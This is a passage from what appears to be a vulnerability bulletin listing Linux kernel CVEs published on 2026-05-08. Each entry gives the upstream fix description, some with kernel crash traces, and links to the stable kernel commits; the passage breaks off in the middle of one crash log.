| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: mctp: fix device leak on probe failure Driver core holds a reference to the USB interface and its parent USB device while the interface is bound to a driver and there is no need to take additional references unless the structures are needed after disconnect. This driver takes a reference to the USB device during probe but does not to release it on probe failures. Drop the redundant device reference to fix the leak, reduce cargo culting, make it easier to spot drivers where an extra reference is needed, and reduce the risk of further memory leaks. | 2026-05-08 | not yet calculated | CVE-2026-43375 | https://git.kernel.org/stable/c/3224990fb16a831aabc50b67c74f5d0074ce80dd https://git.kernel.org/stable/c/ec9538f9b5cd1db5e8c612aa636b6119b6355c5d https://git.kernel.org/stable/c/224a0d284c3caf1951302d1744a714784febed71 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: server: fix use-after-free in smb2_open() The opinfo pointer obtained via rcu_dereference(fp->f_opinfo) is dereferenced after rcu_read_unlock(), creating a use-after-free window. | 2026-05-08 | not yet calculated | CVE-2026-43378 | https://git.kernel.org/stable/c/e1b21e6066615e7d3d3a7aa2677e415e563fd7cc https://git.kernel.org/stable/c/b720c84087cb547f23ce03eab93568c1769e4556 https://git.kernel.org/stable/c/54b48ae83de8bb06e65079d96368efe359d4909c https://git.kernel.org/stable/c/8f5b1a7cb009a93c48e9e334a2f59a660f9afc07 https://git.kernel.org/stable/c/190e5f808e8058640b408ccfed25440b441a718a https://git.kernel.org/stable/c/1e689a56173827669a35da7cb2a3c78ed5c53680 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwmon: (pmbus/q54sj108a2) fix stack overflow in debugfs read The q54sj108a2_debugfs_read function suffers from a stack buffer overflow due to incorrect arguments passed to bin2hex(). The function currently passes 'data' as the destination and 'data_char' as the source. Because bin2hex() converts each input byte into two hex characters, a 32-byte block read results in 64 bytes of output. Since 'data' is only 34 bytes (I2C_SMBUS_BLOCK_MAX + 2), this writes 30 bytes past the end of the buffer onto the stack. Additionally, the arguments were swapped: it was reading from the zero-initialized 'data_char' and writing to 'data', resulting in all-zero output regardless of the actual I2C read. Fix this by: 1. Expanding 'data_char' to 66 bytes to safely hold the hex output. 2. Correcting the bin2hex() argument order and using the actual read count. 3. Using a pointer to select the correct output buffer for the final simple_read_from_buffer call. | 2026-05-08 | not yet calculated | CVE-2026-43380 | https://git.kernel.org/stable/c/a0fc1b9c738fba231f190ab960c83202722efee5 https://git.kernel.org/stable/c/c59090c50f62a17129fc4c5407bc4071305a9e82 https://git.kernel.org/stable/c/52db5ef163c96f916d424e472fb17aadc35a9f7a https://git.kernel.org/stable/c/b48a0f8d4541a4f6651dc9a64430ce9fdf5c120b https://git.kernel.org/stable/c/73a7a345816946d276ad2c46c8bb771de67cfc46 https://git.kernel.org/stable/c/24a7b9daa103fa963b3fd37d8805b23e01621976 https://git.kernel.org/stable/c/25dd70a03b1f5f3aa71e1a5091ecd9cd2a13ee43 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nouveau/dpcd: return EBUSY for aux xfer if the device is asleep If we have runtime suspended, and userspace wants to use /dev/drm_dp_* then just tell it the device is busy instead of crashing in the GSP code. WARNING: CPU: 2 PID: 565741 at drivers/gpu/drm/nouveau/nvkm/subdev/gsp/rm/r535/rpc.c:164 r535_gsp_msgq_wait+0x9a/0xb0 [nouveau] CPU: 2 UID: 0 PID: 565741 Comm: fwupd Not tainted 6.18.10-200.fc43.x86_64 #1 PREEMPT(lazy) Hardware name: LENOVO 20QTS0PQ00/20QTS0PQ00, BIOS N2OET65W (1.52 ) 08/05/2024 RIP: 0010:r535_gsp_msgq_wait+0x9a/0xb0 [nouveau] This is a simple fix to get backported. We should probably engineer a proper power domain solution to wake up devices and keep them awake while fw updates are happening. | 2026-05-08 | not yet calculated | CVE-2026-43381 | https://git.kernel.org/stable/c/178df7c91e6c202579284df9f79d1592a514cdcf https://git.kernel.org/stable/c/4df518aa196085909fd7e32518ecd27fba60ed69 https://git.kernel.org/stable/c/cd24cab2023aa46b595bc6b9cc39d8973d9d0a8c https://git.kernel.org/stable/c/fad178ae894930520519ead3c8e0150641466360 https://git.kernel.org/stable/c/6bdd2d70c338d52c387d3b3aadc596784ae81b01 https://git.kernel.org/stable/c/ad8fa5bff53f5d1f8394f996850da8ce070eaee3 https://git.kernel.org/stable/c/24639553a016578222ac597db924dfb6fa5ec8b5 https://git.kernel.org/stable/c/8f3c6f08ababad2e3bdd239728cf66a9949446b4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: batman-adv: Avoid double-rtnl_lock ELP metric worker batadv_v_elp_get_throughput() might be called when the RTNL lock is already held. This could be problematic when the work queue item is cancelled via cancel_delayed_work_sync() in batadv_v_elp_iface_disable(). In this case, an rtnl_lock() would cause a deadlock. To avoid this, rtnl_trylock() was used in this function to skip the retrieval of the ethtool information in case the RTNL lock was already held. But for cfg80211 interfaces, batadv_get_real_netdev() was called - which also uses rtnl_lock(). The approach for __ethtool_get_link_ksettings() must also be used instead and the lockless version __batadv_get_real_netdev() has to be called. | 2026-05-08 | not yet calculated | CVE-2026-43382 | https://git.kernel.org/stable/c/4c3ae249431b4fcb315d7dfb4c3a13f9e443fd9b https://git.kernel.org/stable/c/192f40ad8a7dac58dae9199a065dbf7e6e67b75b https://git.kernel.org/stable/c/fa7b4edfbabdf9235b0ab4bea297fc12b3bec9ca https://git.kernel.org/stable/c/f3ca45673dab0514a887231de6f3243a699d5bfd https://git.kernel.org/stable/c/b7e5d8ddfdf1d6e9e0808d1adf7736a107372d77 https://git.kernel.org/stable/c/2ab9f2531d37775cd79228c1f5d80e6bd08d11d3 https://git.kernel.org/stable/c/77808fe7d03ad0062840b95f431869a8b3d88b24 https://git.kernel.org/stable/c/cfc83a3c71517b59c1047db57da31e26a9dc2f33 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: rtl8723bs: fix potential out-of-bounds read in rtw_restruct_wmm_ie The current code checks 'i + 5 < in_len' at the end of the if statement. However, it accesses 'in_ie[i + 5]' before that check, which can lead to an out-of-bounds read. Move the length check to the beginning of the conditional to ensure the index is within bounds before accessing the array. | 2026-05-08 | not yet calculated | CVE-2026-43386 | https://git.kernel.org/stable/c/6ff2243d5e05a5239e39d4ba61d96b0ea3bf7259 https://git.kernel.org/stable/c/12cc6e8f8d4245b7b5a408c6fc8ab1d098d67020 https://git.kernel.org/stable/c/209644e25757c499e1c1f08c071ea0386d4448b6 https://git.kernel.org/stable/c/768f25613a9fe6766d15a4a72979657adfc1c6d8 https://git.kernel.org/stable/c/e14a1148f02e8cf1ca380d57e4b95ca36c97f45d https://git.kernel.org/stable/c/4dd2d9cf563c54e09d5f7eacf95c5b8f538b513b https://git.kernel.org/stable/c/d97fc1b29513010b60fde874c7f0ba816744e18c https://git.kernel.org/stable/c/a75281626fc8fa6dc6c9cc314ee423e8bc45203b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: rtl8723bs: properly validate the data in rtw_get_ie_ex() Just like in commit 154828bf9559 ("staging: rtl8723bs: fix out-of-bounds read in rtw_get_ie() parser"), we don't trust the data in the frame so we should check the length better before acting on it | 2026-05-08 | not yet calculated | CVE-2026-43387 | https://git.kernel.org/stable/c/ac38856092b4c994f94343251b30520bdeb7f475 https://git.kernel.org/stable/c/35969c3a208a07cb8642301df5869c34e2db7071 https://git.kernel.org/stable/c/8097a48c606a9306281ea7bd73bf2afc97553733 https://git.kernel.org/stable/c/740bca8bbdb707c0e4bb11e3316deb2f04fc7ce1 https://git.kernel.org/stable/c/821f7d759fb2de33c5e5b0c4981181c4d0c3e9b1 https://git.kernel.org/stable/c/6d62fa548387e159a21ea95132c09bfc96d336ed https://git.kernel.org/stable/c/9a4cd4c37593cc8b8d28f9a6732b490a8032006a https://git.kernel.org/stable/c/f0109b9d3e1e455429279d602f6276e34689750a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/core: clear walk_control on inactive context in damos_walk() damos_walk() sets ctx->walk_control to the caller-provided control structure before checking whether the context is running. If the context is inactive (damon_is_running() returns false), the function returns -EINVAL without clearing ctx->walk_control. This leaves a dangling pointer to a stack-allocated structure that will be freed when the caller returns. This is structurally identical to the bug fixed in commit f9132fbc2e83 ("mm/damon/core: remove call_control in inactive contexts") for damon_call(), which had the same pattern of linking a control object and returning an error without unlinking it. The dangling walk_control pointer can cause: 1. Use-after-free if the context is later started and kdamond dereferences ctx->walk_control (e.g., in damos_walk_cancel() which writes to control->canceled and calls complete()) 2. Permanent -EBUSY from subsequent damos_walk() calls, since the stale pointer is non-NULL Nonetheless, the real user impact is quite restrictive. The use-after-free is impossible because there is no damos_walk() callers who starts the context later. The permanent -EBUSY can actually confuse users, as DAMON is not running. But the symptom is kept only while the context is turned off. Turning it on again will make DAMON internally uses a newly generated damon_ctx object that doesn't have the invalid damos_walk_control pointer, so everything will work fine again. Fix this by clearing ctx->walk_control under walk_control_lock before returning -EINVAL, mirroring the fix pattern from f9132fbc2e83. | 2026-05-08 | not yet calculated | CVE-2026-43388 | https://git.kernel.org/stable/c/ce0aa47c963b8c3e5beace89e2b5a665a64b5b6b https://git.kernel.org/stable/c/9320c77134ab8d7701e20608bbf08517df4fa321 https://git.kernel.org/stable/c/d210fdcac9c0d1380eab448aebc93f602c1cd4e6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm: memfd_luo: always dirty all folios A dirty folio is one which has been written to. A clean folio is its opposite. Since a clean folio has no user data, it can be freed under memory pressure. memfd preservation with LUO saves the flag at preserve(). This is problematic. The folio might get dirtied later. Saving it at freeze() also doesn't work, since the dirty bit from PTE is normally synced at unmap and there might still be mappings of the file at freeze(). To see why this is a problem, say a folio is clean at preserve, but gets dirtied later. The serialized state of the folio will mark it as clean. After retrieve, the next kernel will see the folio as clean and might try to reclaim it under memory pressure. This will result in losing user data. Mark all folios of the file as dirty, and always set the MEMFD_LUO_FOLIO_DIRTY flag. This comes with the side effect of making all clean folios un-reclaimable. This is a cost that has to be paid for participants of live update. It is not expected to be a common use case to preserve a lot of clean folios anyway. Since the value of pfolio->flags is a constant now, drop the flags variable and set it directly. | 2026-05-08 | not yet calculated | CVE-2026-43389 | https://git.kernel.org/stable/c/e901c871d4b592f0042e30f3a0f031eae79744ec https://git.kernel.org/stable/c/7e04bf1f33151a30e06a65b74b5f2c19fc2be128 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nstree: tighten permission checks for listing Even privileged services should not necessarily be able to see other privileged service's namespaces so they can't leak information to each other. Use may_see_all_namespaces() helper that centralizes this policy until the nstree adapts. | 2026-05-08 | not yet calculated | CVE-2026-43390 | https://git.kernel.org/stable/c/0abd81645fc95ec6a9d4e4813000f22c5efc0ff4 https://git.kernel.org/stable/c/8d76afe84fa2babf604b3c173730d4d2b067e361 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched_ext: Fix starvation of scx_enable() under fair-class saturation During scx_enable(), the READY -> ENABLED task switching loop changes the calling thread's sched_class from fair to ext. Since fair has higher priority than ext, saturating fair-class workloads can indefinitely starve the enable thread, hanging the system. This was introduced when the enable path switched from preempt_disable() to scx_bypass() which doesn't protect against fair-class starvation. Note that the original preempt_disable() protection wasn't complete either - in partial switch modes, the calling thread could still be starved after preempt_enable() as it may have been switched to ext class. Fix it by offloading the enable body to a dedicated system-wide RT (SCHED_FIFO) kthread which cannot be starved by either fair or ext class tasks. scx_enable() lazily creates the kthread on first use and passes the ops pointer through a struct scx_enable_cmd containing the kthread_work, then synchronously waits for completion. The workfn runs on a different kthread from sch->helper (which runs disable_work), so it can safely flush disable_work on the error path without deadlock. | 2026-05-08 | not yet calculated | CVE-2026-43392 | https://git.kernel.org/stable/c/e0b14bf06393be137d3efb6a3b7cd5b4b9810a6b https://git.kernel.org/stable/c/c44198f25fdfecc0ec0fe366bf8a47fe17d8e229 https://git.kernel.org/stable/c/05ab9ec5dc24f234e0a2fecf3e6ff937c68f7d81 https://git.kernel.org/stable/c/b06ccbabe2506fd70b9167a644978b049150224a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix chunk map leak in btrfs_map_block() after btrfs_chunk_map_num_copies() Fix a chunk map leak in btrfs_map_block(): if we return early with -EINVAL, we're not freeing the chunk map that we've just looked up. | 2026-05-08 | not yet calculated | CVE-2026-43393 | https://git.kernel.org/stable/c/0e4aaf5a3212b6a469c2489637c29a8e2a5062a5 https://git.kernel.org/stable/c/7bdf00ed75c477252578068dba19934cd825f20a https://git.kernel.org/stable/c/4f90c5c2698383984102401b1724b0b67da832ab https://git.kernel.org/stable/c/f15fb3d41543244d1179f423da4a4832a55bc050 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfsd: Fix cred ref leak in nfsd_nl_listener_set_doit(). nfsd_nl_listener_set_doit() uses get_current_cred() without put_cred(). As we can see from other callers, svc_xprt_create_from_sa() does not require the extra refcount. nfsd_nl_listener_set_doit() is always in the process context, sendmsg(), and current->cred does not go away. Let's use current_cred() in nfsd_nl_listener_set_doit(). | 2026-05-08 | not yet calculated | CVE-2026-43394 | https://git.kernel.org/stable/c/02e87ec0bc706cb93fa47b43d18c4d10102c7d54 https://git.kernel.org/stable/c/019debe5851d7355bea9ff0248cc317878924d8f https://git.kernel.org/stable/c/cba413765376bb466035c9160fa3130402971e2c https://git.kernel.org/stable/c/92978c83bb4eef55d02a6c990c01c423131eefa7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/sync: Cleanup partially initialized sync on parse failure xe_sync_entry_parse() can allocate references (syncobj, fence, chain fence, or user fence) before hitting a later failure path. Several of those paths returned directly, leaving partially initialized state and leaking refs. Route these error paths through a common free_sync label and call xe_sync_entry_cleanup(sync) before returning the error. (cherry picked from commit f939bdd9207a5d1fc55cced5459858480686ce22) | 2026-05-08 | not yet calculated | CVE-2026-43395 | https://git.kernel.org/stable/c/91c228f96fcfacc2341a58815b1da8c69da94ebb https://git.kernel.org/stable/c/af65cd1853599394b94201c08bed7a46717db478 https://git.kernel.org/stable/c/f0af63ffa06306f12592cd3919fad6957b425e1b https://git.kernel.org/stable/c/1bfd7575092420ba5a0b944953c95b74a5646ff8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/sync: Fix user fence leak on alloc failure When dma_fence_chain_alloc() fails, properly release the user fence reference to prevent a memory leak. (cherry picked from commit a5d5634cde48a9fcd68c8504aa07f89f175074a0) | 2026-05-08 | not yet calculated | CVE-2026-43396 | https://git.kernel.org/stable/c/05edc78eb4699e8e000a62aaa8dace50a17e19e3 https://git.kernel.org/stable/c/f8f90b33934b307f6e4599b9fae38aa1ee5441a7 https://git.kernel.org/stable/c/0879c3f04f67e2a1677c25dcc24669ce21eb6a6c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/bridge: samsung-dsim: Fix memory leak in error path In samsung_dsim_host_attach(), drm_bridge_add() is called to add the bridge. However, if samsung_dsim_register_te_irq() or pdata->host_ops->attach() fails afterwards, the function returns without removing the bridge, causing a memory leak. Fix this by adding proper error handling with goto labels to ensure drm_bridge_remove() is called in all error paths. Also ensure that samsung_dsim_unregister_te_irq() is called if the attach operation fails after the TE IRQ has been registered. samsung_dsim_unregister_te_irq() function is moved without changes to be before samsung_dsim_host_attach() to avoid forward declaration. | 2026-05-08 | not yet calculated | CVE-2026-43397 | https://git.kernel.org/stable/c/98310fe3a2a79671b739a5344c1a11d74c503e25 https://git.kernel.org/stable/c/0b07f7d2c5a4078c2f1c11bb36685084fe4e5c95 https://git.kernel.org/stable/c/e6d779654cda63d632bd8dfcdcabd125057e30a5 https://git.kernel.org/stable/c/a40b92fb4b26d4cb1b5e439e55a56db7e79a82d1 https://git.kernel.org/stable/c/803ec1faf7c1823e6e3b1f2aaa81be18528c9436 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: add upper bound check on user inputs in wait ioctl Huge input values in amdgpu_userq_wait_ioctl can lead to a OOM and could be exploited. So check these input value against AMDGPU_USERQ_MAX_HANDLES which is big enough value for genuine use cases and could potentially avoid OOM. v2: squash in Srini's fix (cherry picked from commit fcec012c664247531aed3e662f4280ff804d1476) | 2026-05-08 | not yet calculated | CVE-2026-43398 | https://git.kernel.org/stable/c/b1d10508da559da2e0ca9cca6505094a7df948e1 https://git.kernel.org/stable/c/3cd93bc695b3456f26f5ed52753d9071da26202a https://git.kernel.org/stable/c/64ac7c09fc44985ec9bb6a9db740899fa40ca613 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/userq: Fix reference leak in amdgpu_userq_wait_ioctl Drop reference to syncobj and timeline fence when aborting the ioctl due output array being too small. (cherry picked from commit 68951e9c3e6bb22396bc42ef2359751c8315dd27) | 2026-05-08 | not yet calculated | CVE-2026-43399 | https://git.kernel.org/stable/c/762f47e2b824383d5be65eee2c40a1269b7d50c8 https://git.kernel.org/stable/c/5409247d41f372bec5b141ef599f2d9f5e81b746 https://git.kernel.org/stable/c/49abfa812617a7f2d0132c70d23ac98b389c6ec1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: add upper bound check on user inputs in signal ioctl Huge input values in amdgpu_userq_signal_ioctl can lead to a OOM and could be exploited. So check these input value against AMDGPU_USERQ_MAX_HANDLES which is big enough value for genuine use cases and could potentially avoid OOM. (cherry picked from commit be267e15f99bc97cbe202cd556717797cdcf79a5) | 2026-05-08 | not yet calculated | CVE-2026-43400 | https://git.kernel.org/stable/c/6fff5204d8aa26b1be50b6427f833bd3e8899c4f https://git.kernel.org/stable/c/46630d966b99b0fc6cb01fef4110587f3375a0c0 https://git.kernel.org/stable/c/ea78f8c68f4f6211c557df49174c54d167821962 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cpufreq: intel_pstate: Fix NULL pointer dereference in update_cpu_qos_request() The update_cpu_qos_request() function attempts to initialize the 'freq' variable by dereferencing 'cpudata' before verifying if the 'policy' is valid. This issue occurs on systems booted with the "nosmt" parameter, where all_cpu_data[cpu] is NULL for the SMT sibling threads. As a result, any call to update_qos_requests() will result in a NULL pointer dereference as the code will attempt to access pstate.turbo_freq using the NULL cpudata pointer. Also, pstate.turbo_freq may be updated by intel_pstate_get_hwp_cap() after initializing the 'freq' variable, so it is better to defer the 'freq' until intel_pstate_get_hwp_cap() has been called. Fix this by deferring the 'freq' assignment until after the policy and driver_data have been validated. [ rjw: Added one paragraph to the changelog ] | 2026-05-08 | not yet calculated | CVE-2026-43401 | https://git.kernel.org/stable/c/6bfda7ce56e7d14a677b7bcd6c7a5009cc29aa88 https://git.kernel.org/stable/c/42738dffb7b0766a45882dff7989401d78f66f92 https://git.kernel.org/stable/c/ab39cc4cb8ceecdc2b61747433e7237f1ac2b789 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm: Fix a hmm_range_fault() livelock / starvation problem If hmm_range_fault() fails a folio_trylock() in do_swap_page, trying to acquire the lock of a device-private folio for migration, to ram, the function will spin until it succeeds grabbing the lock. However, if the process holding the lock is depending on a work item to be completed, which is scheduled on the same CPU as the spinning hmm_range_fault(), that work item might be starved and we end up in a livelock / starvation situation which is never resolved. This can happen, for example if the process holding the device-private folio lock is stuck in migrate_device_unmap()->lru_add_drain_all() sinc lru_add_drain_all() requires a short work-item to be run on all online cpus to complete. A prerequisite for this to happen is: a) Both zone device and system memory folios are considered in migrate_device_unmap(), so that there is a reason to call lru_add_drain_all() for a system memory folio while a folio lock is held on a zone device folio. b) The zone device folio has an initial mapcount > 1 which causes at least one migration PTE entry insertion to be deferred to try_to_migrate(), which can happen after the call to lru_add_drain_all(). c) No or voluntary only preemption. This all seems pretty unlikely to happen, but indeed is hit by the "xe_exec_system_allocator" igt test. Resolve this by waiting for the folio to be unlocked if the folio_trylock() fails in do_swap_page(). Rename migration_entry_wait_on_locked() to softleaf_entry_wait_unlock() and update its documentation to indicate the new use-case. Future code improvements might consider moving the lru_add_drain_all() call in migrate_device_unmap() to be called *after* all pages have migration entries inserted. That would eliminate also b) above. v2: - Instead of a cond_resched() in hmm_range_fault(), eliminate the problem by waiting for the folio to be unlocked in do_swap_page() (Alistair Popple, Andrew Morton) v3: - Add a stub migration_entry_wait_on_locked() for the !CONFIG_MIGRATION case. (Kernel Test Robot) v4: - Rename migrate_entry_wait_on_locked() to softleaf_entry_wait_on_locked() and update docs (Alistair Popple) v5: - Add a WARN_ON_ONCE() for the !CONFIG_MIGRATION version of softleaf_entry_wait_on_locked(). - Modify wording around function names in the commit message (Andrew Morton) (cherry picked from commit a69d1ab971a624c6f112cea61536569d579c3215) | 2026-05-08 | not yet calculated | CVE-2026-43404 | https://git.kernel.org/stable/c/94b6d0ba4b640ba23bb6c708a59316e74e5ede63 https://git.kernel.org/stable/c/7e6e2fc91d4b9b12ec6e137019532568ebcf2680 https://git.kernel.org/stable/c/b570f37a2ce480be26c665345c5514686a8a0274 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: kprobes: avoid crash when rmmod/insmod after ftrace killed After we hit ftrace is killed by some errors, the kernel crash if we remove modules in which kprobe probes. BUG: unable to handle page fault for address: fffffbfff805000d PGD 817fcc067 P4D 817fcc067 PUD 817fc8067 PMD 101555067 PTE 0 Oops: Oops: 0000 [#1] SMP KASAN PTI CPU: 4 UID: 0 PID: 2012 Comm: rmmod Tainted: G W OE Tainted: [W]=WARN, [O]=OOT_MODULE, [E]=UNSIGNED_MODULE RIP: 0010:kprobes_module_callback+0x89/0x790 RSP: 0018:ffff88812e157d30 EFLAGS: 00010a02 RAX: 1ffffffff805000d RBX: dffffc0000000000 RCX: ffffffff86a8de90 RDX: ffffed1025c2af9b RSI: 0000000000000008 RDI: ffffffffc0280068 RBP: 0000000000000000 R08: 0000000000000001 R09: ffffed1025c2af9a R10: ffff88812e157cd7 R11: 205d323130325420 R12: 0000000000000002 R13: ffffffffc0290488 R14: 0000000000000002 R15: ffffffffc0280040 FS: 00007fbc450dd740(0000) GS:ffff888420331000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: fffffbfff805000d CR3: 000000010f624000 CR4: 00000000000006f0 Call Trace: <TASK> notifier_call_chain+0xc6/0x280 blocking_notifier_call_chain+0x60/0x90 __do_sys_delete_module.constprop.0+0x32a/0x4e0 do_syscall_64+0x5d/0xfa0 entry_SYSCALL_64_after_hwframe+0x76/0x7e This is because the kprobe on ftrace does not correctly handles the kprobe_ftrace_disabled flag set by ftrace_kill(). To prevent this error, check kprobe_ftrace_disabled in __disarm_kprobe_ftrace() and skip all ftrace related operations. | 2026-05-08 | not yet calculated | CVE-2026-43409 | https://git.kernel.org/stable/c/8b6767e4141b2a42745b544d4555cf1614ba1a2d https://git.kernel.org/stable/c/b0ca81616a010807e91fc31db9be242b96326adc https://git.kernel.org/stable/c/cae928e3178c75602c21d67e21255d73e7e9ed4f https://git.kernel.org/stable/c/9edc79d664832a842012ad105b1521c1a3c35ab3 https://git.kernel.org/stable/c/e113f0b46d19626ec15388bcb91432c9a4fd6261 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: firmware: stratix10-rsu: Fix NULL pointer dereference when RSU is disabled When the Remote System Update (RSU) isn't enabled in the First Stage Boot Loader (FSBL), the driver encounters a NULL pointer dereference when excute svc_normal_to_secure_thread() thread, resulting in a kernel panic: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000008 Mem abort info: ... Data abort info: ... [0000000000000008] user address but active_mm is swapper Internal error: Oops: 0000000096000004 [#1] SMP Modules linked in: CPU: 0 UID: 0 PID: 79 Comm: svc_smc_hvc_thr Not tainted 6.19.0-rc8-yocto-standard+ #59 PREEMPT Hardware name: SoCFPGA Stratix 10 SoCDK (DT) pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : svc_normal_to_secure_thread+0x38c/0x990 lr : svc_normal_to_secure_thread+0x144/0x990 ... Call trace: svc_normal_to_secure_thread+0x38c/0x990 (P) kthread+0x150/0x210 ret_from_fork+0x10/0x20 Code: 97cfc113 f9400260 aa1403e1 f9400400 (f9400402) ---[ end trace 0000000000000000 ]--- The issue occurs because rsu_send_async_msg() fails when RSU is not enabled in firmware, causing the channel to be freed via stratix10_svc_free_channel(). However, the probe function continues execution and registers svc_normal_to_secure_thread(), which subsequently attempts to access the already-freed channel, triggering the NULL pointer dereference. Fix this by properly cleaning up the async client and returning early on failure, preventing the thread from being used with an invalid channel. | 2026-05-08 | not yet calculated | CVE-2026-43410 | https://git.kernel.org/stable/c/aa5739e0c51ad01c6e763ca89c1bfb58fc6ea71a https://git.kernel.org/stable/c/c45f7263100cece247dd3fa5fe277bd97fdb5687 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tipc: fix divide-by-zero in tipc_sk_filter_connect() A user can set conn_timeout to any value via setsockopt(TIPC_CONN_TIMEOUT), including values less than 4. When a SYN is rejected with TIPC_ERR_OVERLOAD and the retry path in tipc_sk_filter_connect() executes: delay %= (tsk->conn_timeout / 4); If conn_timeout is in the range [0, 3], the integer division yields 0, and the modulo operation triggers a divide-by-zero exception, causing a kernel oops/panic. Fix this by clamping conn_timeout to a minimum of 4 at the point of use in tipc_sk_filter_connect(). Oops: divide error: 0000 [#1] SMP KASAN NOPTI CPU: 0 UID: 0 PID: 119 Comm: poc-F144 Not tainted 7.0.0-rc2+ RIP: 0010:tipc_sk_filter_rcv (net/tipc/socket.c:2236 net/tipc/socket.c:2362) Call Trace: tipc_sk_backlog_rcv (include/linux/instrumented.h:82 include/linux/atomic/atomic-instrumented.h:32 include/net/sock.h:2357 net/tipc/socket.c:2406) __release_sock (include/net/sock.h:1185 net/core/sock.c:3213) release_sock (net/core/sock.c:3797) tipc_connect (net/tipc/socket.c:2570) __sys_connect (include/linux/file.h:62 include/linux/file.h:83 net/socket.c:2098) | 2026-05-08 | not yet calculated | CVE-2026-43411 | https://git.kernel.org/stable/c/600feb0a66a98c6b7f6f02b5f3612e75f9b8540f https://git.kernel.org/stable/c/3bc9998041076ee05d3f312a22cee6b2ca35527f https://git.kernel.org/stable/c/579956f9f297eb1b6a5d24de313f3acccee1f9d5 https://git.kernel.org/stable/c/a360d3815aae1f00dd71b7714a846482e85cc1f7 https://git.kernel.org/stable/c/c2ebfbe63deb7bfd4dc2532bae62a7ed67713272 https://git.kernel.org/stable/c/2754e7b3d64748643df867d1ea6fec522914b635 https://git.kernel.org/stable/c/338c5edeb6ae3f12a4b84dff9d71f6f7f8c202c3 https://git.kernel.org/stable/c/6c5a9baa15de240e747263aba435a0951da8d8d2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: qcom: qdsp6: Fix q6apm remove ordering during ADSP stop and start During ADSP stop and start, the kernel crashes due to the order in which ASoC components are removed. On ADSP stop, the q6apm-audio .remove callback unloads topology and removes PCM runtimes during ASoC teardown. This deletes the RTDs that contain the q6apm DAI components before their removal pass runs, leaving those components still linked to the card and causing crashes on the next rebind. Fix this by ensuring that all dependent (child) components are removed first, and the q6apm component is removed last. [ 48.105720] Unable to handle kernel NULL pointer dereference at virtual address 00000000000000d0 [ 48.114763] Mem abort info: [ 48.117650] ESR = 0x0000000096000004 [ 48.121526] EC = 0x25: DABT (current EL), IL = 32 bits [ 48.127010] SET = 0, FnV = 0 [ 48.130172] EA = 0, S1PTW = 0 [ 48.133415] FSC = 0x04: level 0 translation fault [ 48.138446] Data abort info: [ 48.141422] ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000 [ 48.147079] CM = 0, WnR = 0, TnD = 0, TagAccess = 0 [ 48.152354] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [ 48.157859] user pgtable: 4k pages, 48-bit VAs, pgdp=00000001173cf000 [ 48.164517] [00000000000000d0] pgd=0000000000000000, p4d=0000000000000000 [ 48.171530] Internal error: Oops: 0000000096000004 [#1] SMP [ 48.177348] Modules linked in: q6prm_clocks q6apm_lpass_dais q6apm_dai snd_q6dsp_common q6prm snd_q6apm 8021q garp mrp stp llc snd_soc_hdmi_codec apr pdr_interface phy_qcom_edp fastrpc qcom_pd_mapper rpmsg_ctrl qrtr_smd rpmsg_char qcom_pdr_msg qcom_iris v4l2_mem2mem videobuf2_dma_contig ath11k_pci msm ubwc_config at24 ath11k videobuf2_memops mac80211 ocmem videobuf2_v4l2 libarc4 drm_gpuvm mhi qrtr videodev drm_exec snd_soc_sc8280xp gpu_sched videobuf2_common nvmem_qcom_spmi_sdam snd_soc_qcom_sdw drm_dp_aux_bus qcom_q6v5_pas qcom_spmi_temp_alarm snd_soc_qcom_common rtc_pm8xxx qcom_pon drm_display_helper cec qcom_pil_info qcom_stats soundwire_bus drm_client_lib mc dispcc0_sa8775p videocc_sa8775p qcom_q6v5 camcc_sa8775p snd_soc_dmic phy_qcom_sgmii_eth snd_soc_max98357a i2c_qcom_geni snd_soc_core dwmac_qcom_ethqos llcc_qcom icc_bwmon qcom_sysmon snd_compress qcom_refgen_regulator coresight_stm stmmac_platform snd_pcm_dmaengine qcom_common coresight_tmc stmmac coresight_replicator qcom_glink_smem coresight_cti stm_core [ 48.177444] coresight_funnel snd_pcm ufs_qcom phy_qcom_qmp_usb gpi phy_qcom_snps_femto_v2 coresight phy_qcom_qmp_ufs qcom_wdt gpucc_sa8775p pcs_xpcs mdt_loader qcom_ice icc_osm_l3 qmi_helpers snd_timer snd soundcore display_connector qcom_rng nvmem_reboot_mode drm_kms_helper phy_qcom_qmp_pcie sha256 cfg80211 rfkill socinfo fuse drm backlight ipv6 [ 48.301059] CPU: 2 UID: 0 PID: 293 Comm: kworker/u32:2 Not tainted 6.19.0-rc6-dirty #10 PREEMPT [ 48.310081] Hardware name: Qualcomm Technologies, 